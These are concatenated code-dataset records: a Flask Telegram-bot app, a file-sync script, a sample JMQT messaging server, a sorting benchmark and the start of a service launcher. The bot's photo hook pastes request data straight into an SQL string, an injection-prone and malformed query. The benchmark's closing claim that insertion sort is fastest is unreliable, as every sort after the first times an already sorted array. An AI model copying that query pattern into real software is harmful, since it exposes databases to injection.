tele_util.getProp(msg.getChatId(), 'addFile', default='N'):\n tele_util.addFile(msg)\n if 'Y' != tele_util.getProp(msg.getChatId(), 'MsgLog/deaktivate', default='N'):\n tele_util.updateMsgLog(msg.upd)\n return 'OK'\n\ndnbot = tele_util.startBot(config.dntelegram)\n\n@app.route(config.dntelegram['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef dnbot_hook():\n m = request.get_json()\n if m.get('message', {}).get('photo', None):\n sql = \"\"\"\n insert into photo values\n select '%(f)s' from DUAL where not exists (\n select file_id from photo where file_id = '%(f)s'\n ) limit 1\"\"\" % {'f': m['message']['photo'][0]['file_id']}\n tele_util.executeSQL(sql)\n return \"OK\"\n\ntriviabot = tele_util.startBot(config.triviabot)\n@app.route(config.triviabot['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef triviabot_hook():\n msg = tele_util.MsgUtil(triviabot, request.get_json())\n if msg.cmd == 'trivia':\n cmds.trivia(msg, config=config.triviabot)\n return \"OK\"\n\n\ncrabbot = tele_util.startBot(config.crabtelegram)\n\n@app.route(config.crabtelegram['hook'], methods=['POST'])\n@tele_util.tryAndLogError\ndef crabbot_hook():\n msg = tele_util.MsgUtil(crabbot, request.get_json())\n if msg.cmd == 'silence':\n crab.createOutPng(msg.txt)\n msg.send('', typ='p', file='/home/fia4awagner/mysite/img/out.png')\n return \"OK\"\n\n@app.route('/groupstats/')\ndef groupstats(groupid):\n data = stats.getData(groupid, request)\n users = stats.getUser(data)\n\n out = {\n 'groupid': data['chat_id'],\n 'groupname': 'idb with friends',\n 'scalestart': data['start'],\n 'scaleend': data['end'],\n 'btnday': True,\n 'linelabels': ['%02d:00' % i for i in range(0,24)],\n 'linedata': stats.getLinedata(data, users),\n 'users': users,\n 'chart1': stats.getChart1(data),\n 'chart2': stats.getChart2(data),\n 'chart3': stats.getChart3(data),\n }\n return render_template('group_stats.html', **out)\n\n@app.route('/sensordata/put', methods=['POST'])\n@tele_util.tryAndLogError\ndef put_sensor_data():\n json = request.get_json()\n data = {'sensor': json['sensor'],\n 'time': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'temp': int(json['temp']),\n 'humidity': int(json['humidity']),}\n sql = 'insert into sensor_data value (%(sensor)s, %(time)s, %(temp)s, %(humidity)s);'\n tele_util.executeSQL(sql, data)\n return \"OK\"\n\n\n\n\n", "repo_name": "swa9bot/paw", "sub_path": "flask_app.py", "file_name": "flask_app.py", "file_ext": "py", "file_size_in_byte": 3424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "time.tzset", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "tele_util.startBot", "line_number": 12, "usage_type": "call"}, {"api_name": "config.swagbot", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cmds.zitat", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cmds.gif", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cmds.tenor", "line_number": 16, "usage_type": "attribute"}, {"api_name": "cmds.list_", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cmds.roulette", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cmds.bit", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cmds.sendViaBot", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cmds.dailyPost", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cmds.rollFunc", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cmds.props", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cmds.quiz", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cmds.trivia", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cmds.truth", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cmds.dare", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cmds.stats", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tele_util.MsgUtil", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "tele_util.getProp", "line_number": 39, "usage_type": "call"}, {"api_name": "tele_util.addFile", "line_number": 40, "usage_type": "call"}, {"api_name": "tele_util.getProp", "line_number": 41, "usage_type": "call"}, {"api_name": "tele_util.updateMsgLog", "line_number": 42, "usage_type": "call"}, {"api_name": "config.swagbot", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tele_util.startBot", "line_number": 45, "usage_type": "call"}, {"api_name": "config.dntelegram", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request.get_json", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "tele_util.executeSQL", "line_number": 57, "usage_type": "call"}, {"api_name": "config.dntelegram", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tele_util.startBot", "line_number": 60, "usage_type": "call"}, {"api_name": "config.triviabot", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tele_util.MsgUtil", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 64, "usage_type": "name"}, {"api_name": "cmds.trivia", "line_number": 66, "usage_type": "call"}, {"api_name": "config.triviabot", "line_number": 66, "usage_type": "attribute"}, {"api_name": "config.triviabot", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tele_util.startBot", "line_number": 70, "usage_type": "call"}, {"api_name": "config.crabtelegram", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tele_util.MsgUtil", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 75, "usage_type": "name"}, {"api_name": "crab.createOutPng", "line_number": 77, "usage_type": "call"}, {"api_name": "config.crabtelegram", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tele_util.tryAndLogError", "line_number": 73, "usage_type": "attribute"}, {"api_name": "stats.getData", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 83, "usage_type": "argument"}, {"api_name": "stats.getUser", "line_number": 84, "usage_type": "call"}, {"api_name": "stats.getLinedata", "line_number": 93, "usage_type": "call"}, {"api_name": "stats.getChart1", "line_number": 95, "usage_type": "call"}, {"api_name": "stats.getChart2", "line_number": 96, "usage_type": "call"}, {"api_name": "stats.getChart3", "line_number": 97, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 104, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 106, "usage_type": "call"}, {"api_name": "tele_util.executeSQL", "line_number": 110, "usage_type": "call"}, {"api_name": "tele_util.tryAndLogError", "line_number": 102, "usage_type": "attribute"}]} +{"seq_id": "39727261273", "text": "# -*- updateMasterFiles2Servers.py -*- #\n\"\"\"\nSYNOPSIS\n Copy the updated files from the master directory to the selected servers\n\nDESCRIPTION\n description of the functions\n \nEXAMPLES\n class listSrcFiles(folderSrc) - creates an object that contains folderSrc (the name of the subfolder in the source\n folder), path (the whole path of folderSrc), and listFiles (the list of files that need to be uploaded)\n def main(folderSrc, folderDest, folderSub) - upload files from folderSrc/folderSub to folderDest/folderSub\n\nVERSION 0.0\nAUTHOR\n Becket Hui 2020 07\n \n\"\"\"\nimport glob, logging, os, sys, time\nfrom shutil import copy\n\n\nclass listSrcFiles:\n def __init__(self, folderSrc):\n self.folderSrc = folderSrc\n self.pathSrc = ''\n self.listFiles = []\n\n\ndef main(folderSrc, folderDest, folderSub):\n # file types to copy:\n listExt = ['*.dll', '*.xml', '*.csv', '*.cs']\n # check if subfolders exist in source\n listSrcObj = []\n for subD in folderSub:\n path = os.path.join(folderSrc, subD)\n if not os.path.isdir(path):\n logger.error('Source folder ' + path + ' does not exist, exiting...')\n sys.exit(time.sleep(5))\n else:\n listObj = listSrcFiles(subD)\n listObj.pathSrc = path\n [listObj.listFiles.extend(glob.glob(os.path.join(path, extension))) for extension in listExt]\n listSrcObj.append(listObj)\n # start upload process\n logger.info('Start uploading process...')\n for destination in folderDest:\n # first check if destination folder exists\n if not os.path.isdir(destination):\n logger.warning('Destination ' + destination + ' cannot be found, skipping...')\n continue\n for srcObj in listSrcObj:\n # check if subfolder exists in the destination\n destPath = os.path.join(destination, srcObj.folderSrc)\n if not os.path.isdir(destPath):\n logger.warning(destPath + ' does not exist, skipping...')\n continue\n # if subfolder exists, copy newer files from source to destination\n logger.info('Copying files from ' + srcObj.folderSrc + ' to ' + destination)\n for srcFile in srcObj.listFiles:\n srcTime = os.path.getmtime(srcFile)\n destFilePath = os.path.join(destPath, os.path.basename(srcFile))\n destTime = os.path.getmtime(destFilePath) if os.path.exists(destFilePath) else None\n if destTime is None or destTime < srcTime:\n copy(srcFile, destFilePath)\n logger.debug('Copy ' + srcFile + ' to ' + destination + ' completed.')\n else:\n logger.debug('Skip copying ' + srcFile + ', file in ' + destination + ' is newer.')\n return\n\n\nif __name__ == '__main__':\n folderCurr = os.path.dirname(os.path.abspath(__file__))\n try:\n settingFile = os.path.join(folderCurr, 'updateMasterFilesSettings.txt')\n readDirSrc = False\n readDirDest = False\n readSubFolder = False\n folderSrc = ''\n folderSub = []\n folderDest = []\n with open(settingFile, 'r') as filePt:\n for line in filePt:\n if line.rstrip() == 'Source:':\n readDirSrc = True\n readDirDest = False\n readSubFolder = False\n continue\n if line.rstrip() == 'Destinations:':\n readDirSrc = False\n readDirDest = True\n readSubFolder = False\n continue\n if line.rstrip() == 'Subfolders:':\n readDirSrc = False\n readDirDest = False\n readSubFolder = True\n continue\n if readDirSrc is True:\n folderSrc = line.rstrip()\n if readDirDest is True:\n folderDest.append(line.rstrip())\n if readSubFolder is True:\n folderSub.append(line.rstrip())\n except:\n print('Error in reading ' + settingFile + '!!')\n sys.exit(time.sleep(5))\n try:\n logFile = os.path.join(folderCurr, 'log.txt')\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG) # need to set logger level to lowest\n # set file handler\n fileHandler = logging.FileHandler(logFile, mode='w')\n fileHandler.setFormatter(logging.Formatter('%(asctime)s: %(levelname)-8s %(message)s',\n datefmt='%Y/%m/%d %H:%M:%S'))\n fileHandler.setLevel(logging.DEBUG)\n logger.addHandler(fileHandler)\n # set console handler\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logging.Formatter('%(message)s'))\n consoleHandler.setLevel(logging.INFO)\n logger.addHandler(consoleHandler)\n except:\n print('Cannot open ' + logFile + ', please close the log file and restart.')\n sys.exit(time.sleep(5))\n logger.info('Start updateMasterFiles2Servers')\n logger.debug('Source folder:')\n logger.debug(folderSrc)\n logger.debug('Destination folders:')\n [logger.debug(folder) for folder in folderDest]\n main(folderSrc, folderDest, folderSub)\n logger.info('Transfer completed.')\n sys.exit(time.sleep(10))", "repo_name": "x2sky/Py_AOAupdateServerFiles", "sub_path": "updateMasterFiles2Servers.py", "file_name": "updateMasterFiles2Servers.py", "file_ext": "py", "file_size_in_byte": 5426, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 39, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path", "line_number": 54, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 63, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 107, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 110, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 111, "usage_type": "attribute"}, {"api_name": "logging.FileHandler", "line_number": 113, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 114, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 116, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 119, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 120, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 121, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 125, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 133, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "15296288537", "text": "import os\nroot_path = os.path.dirname(os.path.realpath(__file__))\n# path where pyjmqt.server package is saved\nmodules_root_path = os.path.dirname(root_path)\nimport json\nimport threading\nimport asyncio\nimport sys\n# if the modules_root_path is not in sys.path, we have to insert it to sys.path before importing pyjmqt.server\nif modules_root_path not in sys.path:\n sys.path.insert(0, modules_root_path)\nfrom pyjmqt.server.api import Server\n\n# JMQT application class defines and implements the main application\nclass MyJMQTApp():\n # constructor of the JMQT application class\n def __init__(self, loop):\n # the eventloop passed during the object creation\n self.loop = loop\n # setup the JMQT server\n self.configFile = os.path.join(root_path, 'server.conf')\n\n # create the object of JMQT Server\n self.server = Server(self.loop, self.configFile)\n\n # register the callbacks, all are mandatory\n # validation callbacks\n self.server.set_authentication_validator(self.validate_auth)\n self.server.set_connection_validator(self.validate_conn)\n self.server.set_subscription_validator(self.validate_sub)\n self.server.set_publish_validator(self.validate_pub)\n # handler callbacks\n self.server.set_control_channel_handler(self.control_packet_handler)\n # notifier callbacks\n self.server.set_unsubscription_validator(self.validate_unsub)\n self.server.set_disconnection_notifier(self.disconnection_notifier)\n self.server.set_conn_close_notifier(self.conn_close_notifier)\n\n # gets the server logger (may be used to log all information at a place)\n self.logger = self.server.get_logger()\n # 4 methods are available for logging, i.e:\n # log_info, log_debug, log_warning, and log_error\n self.logger.log_info('Server Start', 'MyJMQTApp')\n # gets the server config in a dictionary\n self.serverConfig = self.server.get_server_config()\n # to access a config item, we can use self.serverConfig['']\n # e.g. self.serverConfig['MONGO_HOST']\n # update channel will be used to inform other clients when a client is online or offline\n self.UpdateChannel = 'update'\n\n async def validate_auth(self, auth_data, remote_host, protocol):\n \"\"\"\n Validates authentication request.\n\n Called when a client sends auth request. This function must authenticate the client and return\n authentication status with client id and optional message (reason why authenctication is not OK)\n\n :param auth_data: Authentication data sent by the client (any, usually dictionary)\n :param remote_host: : the client is connecting from (string)\n :param protocol: Protocol which the client is connecting from (string)\n :return: returns a tuple with status code (boolean), client id (string), auth token(string) and messagse (string)\n message can be blank, it must contain the reason if the authentication failes\n \"\"\"\n status_code, client_id, token, message = self.server.StatusCodes.FAILED, '', '', ''\n # for the sample server, we will use the client_name field to authenticate a client\n # here we are authentiating all clients, this authentication will be application specific\n if 'client_name' in auth_data:\n uid = auth_data['client_name']\n client_id = str(uid)\n status_code = self.server.StatusCodes.OK\n token = \"test-token\"\n else:\n status_code = self.server.StatusCodes.INVALID_PACKET\n message = \"Invalid auth data, client_name is missing\"\n return (status_code, client_id, token, message)\n\n async def validate_conn(self, client_id, auth_token, remote_host, protocol):\n \"\"\"\n Validates connection request.\n\n Called when a client sends conn request. This function must allow or deny the client to connect\n\n :param client_id: Client id of the client (string)\n :param auth_token: Auth token previously sent from validate_auth function (string)\n :param remote_host: : the client is connecting from (string)\n :param protocol: Protocol which the client is connecting from (string)\n :return: returns status code (boolean)\n \"\"\"\n if auth_token == \"test-token\":\n # here we need to add the default channels for the client\n # for example, we are adding the p2p channel here\n await self.server.force_sub(client_id, '#' + client_id, persistent_flag = 1)\n # next we will add the update channel\n await self.server.force_sub(client_id, self.UpdateChannel, persistent_flag = 1)\n # now we will send the connection info to the update channel\n await self.server.force_pub(self.UpdateChannel, {'online': client_id}, qos = 0, retain = 0)\n return self.server.StatusCodes.OK\n else:\n return self.server.StatusCodes.INVALID_TOKEN\n \n async def validate_sub(self, client_id, channel, persistent_flag, remote_host, protocol):\n \"\"\"\n Validates subscription request.\n\n Called when a client sends sub request. This function must allow or deny the subscription\n\n :param client_id: Client id of the client (string)\n :param channel: channel name which the client wants to subscribe to (string)\n :param persistent_flag: indicates the subscription if persistent or not (boolean)\n :param remote_host: : the client is connecting from (string)\n :param protocol: Protocol which the client is connecting from (string)\n :return: returns status code (boolean)\n \"\"\"\n # here we will reject any subscription to update channel\n # this channel is reserved for the server\n if channel == self.UpdateChannel:\n return self.server.StatusCodes.NOT_ALLOWED\n return self.server.StatusCodes.OK\n \n async def validate_unsub(self, client_id, channel, remote_host, protocol):\n \"\"\"\n Validates unsubscription request.\n\n Called when a client sends sub request. This function must allow or deny the unsubscription\n\n :param client_id: Client id of the client (string)\n :param channel: channel name which the client wants to subscribe to (string)\n :param remote_host: : the client is connecting from (string)\n :param protocol: Protocol which the client is connecting from (string)\n :return: returns status code (boolean)\n \"\"\"\n # here we will reject any unsubscription from update channel\n # this channel is reserved for the server\n if channel == self.UpdateChannel:\n return self.server.StatusCodes.NOT_ALLOWED\n return self.server.StatusCodes.OK\n \n async def validate_pub(self, client_id, channel, data, qos, remote_host, protocol):\n \"\"\"\n Validates publish request.\n\n Called when a client sends pub request. This function must allow or deny the publish\n\n :param client_id: Client id of the client (string)\n :param channel: channel name which the client wants to publish the data (string)\n :param data: published data by the client (any, usually dictionary)\n :param remote_host: : the client is connecting from (string)\n :param protocol: Protocol which the client is connecting from (string)\n :return: returns status code (boolean)\n \"\"\"\n # here we will reject any publish to update channel\n # this channel is reserved for the server\n if channel == self.UpdateChannel:\n return self.server.StatusCodes.NOT_ALLOWED\n return self.server.StatusCodes.OK \n\n async def control_packet_handler(self, client_id, channel, data, remote_host, protocol):\n \"\"\"\n Handles publish requests to control channels.\n\n Called when a client sends a control data request(pub request to control channels starts with $ sign).\n This function must return the relevant data with status code\n\n :param client_id: Client id of the client (string)\n :param channel: control channel name (string)\n :param data: request data by the client (any, usually dictionary)\n :param remote_host: : the client is connecting from (string)\n :param protocol: Protocol which the client is connecting from (string)\n :return: returns tuple with status code (boolean) and response data (any)\n \"\"\"\n # returns a list of subscribed channels by the client\n if channel == '$mySubscriptions':\n response_data = {'channels' : await self.server.get_subscriptions(client_id)}\n # e.g. response_data = {'msg': 'hi'}\n return (self.server.StatusCodes.OK, response_data)\n \n async def disconnection_notifier(self, client_id, remote_host, protocol):\n \"\"\"\n Notifies when a client sends the disconn packet\n\n Called when a client sends the disconn packet\n\n :param client_id: Client id of the client (string)\n :param remote_host: : the client was connected from (string)\n :param protocol: Protocol which the client was connected from (string)\n :return: returns nothing\n \"\"\"\n # now we will send the connection info to the update channel\n await self.server.force_pub(self.UpdateChannel, {'offline': client_id}, qos = 0, retain = 0)\n\n async def conn_close_notifier(self, client_id, remote_host, protocol):\n \"\"\"\n Notifies when a client closes the socket\n\n Called when a client closes the socket\n\n :param client_id: Client id of the client (string)\n :param remote_host: : the client was connected from (string)\n :param protocol: Protocol which the client was connected from (string)\n :return: returns nothing\n \"\"\"\n # we can notify the other clients about this event using force_pub message\n await self.server.force_pub(self.UpdateChannel, {'offline': client_id}, qos = 0, retain = 0)\n\n def start(self):\n \"\"\"\n call the start server function\n \"\"\"\n self.logger.log_info('Server start', 'MyJMQTApp')\n self.server.start()\n \n def stop(self):\n \"\"\"\n call the stop server function\n \"\"\"\n self.logger.log_info('Server stop', 'MyJMQTApp')\n self.server.stop()\n\nif __name__ == '__main__':\n # get the asyncio event loop\n loop = asyncio.get_event_loop()\n # pass the loop to the app\n myApp = MyJMQTApp(loop)\n # start the server\n myApp.start()\n try:\n # run the loop and wait for the KeyboardInterrupt\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n # if Interrupt is received, stop the server\n myApp.stop()", "repo_name": "shubhadeepb14/jmqt", "sub_path": "examples/sample_server.py", "file_name": "sample_server.py", "file_ext": "py", "file_size_in_byte": 10880, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pyjmqt.server.api.Server", "line_number": 24, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "21618329098", "text": "from datetime import datetime\r\nimport random\r\n\r\ndef bubblesort(arr):\r\n for i in range(len(arr)):\r\n for j in range(len(arr) - i - 1):\r\n if arr[j] > arr[j + 1]:\r\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\r\n return arr\r\n\r\ndef insertionsort(arr):\r\n for i in range(1, len(arr)): # n\r\n j = i\r\n while j > 0 and arr[j] < arr[j - 1]: # Proceeding Element > Preceding Element (n)\r\n # Swap\r\n arr[j], arr[j - 1] = arr[j - 1], arr[j]\r\n j -= 1\r\n return arr\r\n\r\n\r\ndef quicksort(arr):\r\n if len(arr) < 2:\r\n return arr\r\n else:\r\n pivot = arr[-1]\r\n equal, smaller, larger = [], [], []\r\n for i in arr:\r\n if i < pivot:\r\n smaller.append(i)\r\n elif i == pivot:\r\n equal.append(i)\r\n else:\r\n larger.append(i)\r\n return quicksort(smaller) + equal + quicksort(larger)\r\n\r\ndef selectionsort(arr):\r\n for i in range(len(arr)): # n\r\n for j in range(i, len(arr)): # n\r\n if arr[j] < arr[i]:\r\n arr[i], arr[j] = arr[j], arr[i]\r\n return arr\r\n\r\ndef mergesort(arr):\r\n if len(arr) > 1:\r\n mid = len(arr) // 2 # Finding mid of the array\r\n left = arr[:mid] # Dividing Array into 2 halves\r\n right = arr[mid:] # Dividing Array into 2 halves\r\n\r\n mergesort(left) # Sorting Left Half\r\n mergesort(right) # Sorting Right Half\r\n\r\n i = j = k = 0\r\n\r\n while i < len(left) and j < len(right):\r\n if left[i] < right[j]: # Element in left array if smaller than that of the right, element in the left array gets appended to resulting left\r\n arr[k] = left[i] # Replace element into the orignal array\r\n i += 1\r\n else:\r\n arr[k] = right[j]\r\n j += 1\r\n k += 1\r\n\r\n # Left unsorted, right sorted\r\n while i < len(left):\r\n arr[k] = left[i]\r\n i += 1\r\n k += 1\r\n\r\n # Right unsorted, left sorted\r\n while j < len(right):\r\n arr[k] = right[j]\r\n j += 1\r\n k += 1\r\n\r\n return arr\r\n\r\ndef shellsort(arr):\r\n\r\n gap = len(arr) // 2\r\n while gap > 0:\r\n for i in range(gap, len(arr)):\r\n temp = arr[i]\r\n j = i\r\n while j >= gap and arr[j - gap] > temp: # Checks that the elem if smaller than that of the left side relative to pos of current elem\r\n arr[j] = arr[j - gap]\r\n j -= gap\r\n arr[j] = temp\r\n gap //= 2\r\n return arr\r\n\r\n\r\ndef randomArrayGenerator(n):\r\n return list(set(random.randint(1, 10000) for i in range(n+1)))\r\n\r\narr = randomArrayGenerator(1001)\r\n\r\ndef timeanalysis(func, arr):\r\n start = datetime.now()\r\n func(arr)\r\n end = datetime.now()\r\n print(f'Time Taken for {func} to Sort:', end - start)\r\n\r\ntimeanalysis(bubblesort, arr)\r\ntimeanalysis(insertionsort, arr)\r\ntimeanalysis(quicksort, arr)\r\ntimeanalysis(selectionsort, arr)\r\ntimeanalysis(mergesort, arr)\r\ntimeanalysis(shellsort, arr)\r\n\r\n'''\r\nOn average, insertion sort has the fastest run time!\r\n'''\r\n\r\n", "repo_name": "peanutsee/Data-Structures-and-Algorithms-Python", "sub_path": "Sorting Algorithms (DONE)/Time Complexity Analysis/Time Complexity Analysis.py", "file_name": "Time Complexity Analysis.py", "file_ext": "py", "file_size_in_byte": 3168, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.randint", "line_number": 93, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 100, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 100, "usage_type": "name"}]} +{"seq_id": "37431596320", "text": "\"\"\"Main main_service module.\"\"\"\nimport argparse\nimport asyncio\nimport json\nimport logging\nimport os\nimport signal\nimport sys\nfrom contextlib import suppress\nfrom logging.handlers import TimedRotatingFileHandler\nfrom typing import TextIO, Type\n\nfrom service_framework.base_broker import BaseBroker\nfrom service_framework.base_handler import BaseHandler\nfrom service_framework.base_service import BaseService\nfrom service_framework.broker.rabbit_broker_async import RabbitBrokerAsync\nfrom service_framework.config_service import ServiceConfig\n\nos.environ['no_proxy'] = '*'\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n\ndef set_logger(log_path: str, log_name: str, log_level: str = 'DEBUG') -> None:\n \"\"\"\n Set up logger according settings.\n\n Args:\n log_level (str): Logger level.\n log_path (str): File path to save log.\n log_name (str): File name to save log\n\n Raises:\n Exception: if error in logger setting up.\n\n \"\"\"\n try:\n logger_handler = TimedRotatingFileHandler(\n os.path.join(\n log_path,\n '{0}.log'.format(log_name),\n ),\n when='W6',\n )\n except Exception:\n logger.exception('Logger has error while setting up handler.')\n raise\n try:\n logger_handler.setLevel(log_level.upper())\n except Exception:\n logger.exception('Logger has error while setting up level.')\n formatter = logging.Formatter(\n '{asctime} :: {name:22s} :: {levelname:8s} :: {message}',\n style='{',\n )\n logger_handler.setFormatter(formatter)\n logger.addHandler(logger_handler)\n logger.info('Logger has been successfully set up.')\n\n\ndef load_config(config_file: TextIO) -> ServiceConfig:\n \"\"\"\n Load configuration from json-file and structuring into a class-notation.\n\n Args:\n config_file (TextIO): file with config\n\n Raises:\n Exception: if error while getting configuration.\n\n Returns:\n loaded_config (MainConfig): Config for Zabbix, Redis, Psql, logger.\n\n \"\"\"\n try:\n loaded_config = ServiceConfig(\n **json.loads(\n config_file.read(),\n ),\n )\n except Exception:\n logger.exception('Error getting configuration')\n raise\n return loaded_config\n\n\ndef load_routes(routes_file: str) -> dict:\n \"\"\"\n Load queues from json-file and structuring into a class-notation.\n\n Args:\n routes_file (str): path to queue settings file\n\n Raises:\n Exception: if error while getting configuration.\n FileExistsError: if queue file does not exists.\n\n Returns:\n loaded_routes (MainConfig): List of queues.\n\n \"\"\"\n if os.path.exists(routes_file):\n with open(routes_file, 'r') as q_file:\n try:\n loaded_routes = json.loads(\n q_file.read(),\n )\n except Exception:\n logger.exception('Error getting queue configuration')\n raise\n else:\n logger.error('Queue settings file does not exists.')\n raise FileExistsError\n return loaded_routes\n\n\ndef launch_service(callback_handler: Type[BaseHandler], *args, **kwargs):\n \"\"\"\n Make preparation and start service.\n\n Init argument parser and parse command line.\n Load config and add extra data to it.\n Set logger.\n Create, init and start service.\n\n Args:\n callback_handler (Type[BaseHandler]): handler instance to callback\n args: extra arguments for handler constructor\n kwargs: extra key arguments for handler constructor\n\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-C',\n '--config',\n help='Required. Path to file with configurations',\n required=True,\n type=argparse.FileType('r'),\n dest='config_file',\n )\n parser.add_argument(\n '-s',\n '--service',\n help='Required. Service name to identify it',\n required=True,\n type=str,\n dest='service_name',\n )\n parsed_args = parser.parse_args()\n\n config = load_config(config_file=parsed_args.config_file)\n config.identifier = parsed_args.service_name\n\n 